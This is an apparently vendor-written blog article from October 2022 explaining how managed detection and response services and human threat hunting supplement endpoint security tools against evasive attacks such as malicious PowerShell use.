October 20, 2022
How Managed Detection and Response Services Bolster Cyberdefences
A partner with advanced threat-hunting capabilities can augment internal tools and teams.
As hackers evolve their tactics, security tools alone aren’t enough
It’s tempting to believe your defences are secure if you deploy an arsenal of advanced security solutions. Unfortunately, many organizations don’t fully appreciate that security tools alone aren’t always enough.
At this point, most endpoint protection tools generally are effective at detecting known threats. When they encounter a situation they’ve seen before, they can take action against it without human intervention. In other cases, tools can detect a threat and block the initial instance, but they still need someone to investigate to ensure the rest of the environment remains secure.
The problem is that attackers know how security tools function, and they know how to evade detection. Increasingly, adversaries are launching “living off the land” attacks in which they take advantage of legitimate tools to exploit vulnerabilities.
One of the most common techniques is the malicious use of PowerShell. No matter how good security tools are, they can’t distinguish between malicious and legitimate uses of PowerShell. The best they can do is to flag activity that might indicate an attacker, prompting a human to investigate the potential threat and determine what action is needed.
Another common scenario is that an attacker does something new in the environment that the security tool hasn’t encountered before. Once again, the tool can’t take action, so human intervention is needed.
MDR services address these vulnerabilities through an ongoing process of threat hunting. A security analyst who knows how to think like an attacker continually looks for threats that have evaded detection by security tools. When a tool encounters a new attack type or new suspicious behaviour, the analyst is the last line of defence.
Organizations struggle to acquire true threat-hunting expertise
The increasing sophistication of hackers isn’t the only reason to adopt MDR. Another common motivation is the need to address a talent gap. Many organizations find it difficult to hire cybersecurity professionals who can use security tools effectively. Even organizations that manage to hire security professionals find that they may not have all the specialized capabilities needed to engage in threat hunting. In addition, as attackers have become more sophisticated, so have security tools — which means there are even fewer people equipped to use them effectively.
Some organizations adopt MDR in the wake of a breach. They’ve experienced it once and want to ensure it does not happen again. Organizations undergoing fast growth may invest in MDR proactively. They know that as they grow, they’ll collect and produce more data, and they want to minimize the security vulnerabilities associated with data sprawl.
The bottom line, for many organizations, boils down to which threats are the most significant for their environments, which tools they need to optimize their visibility and where capability gaps prevent them from deriving full value from those tools. MDR is proving to be an essential defence for organizations that want to stay one step ahead of attackers.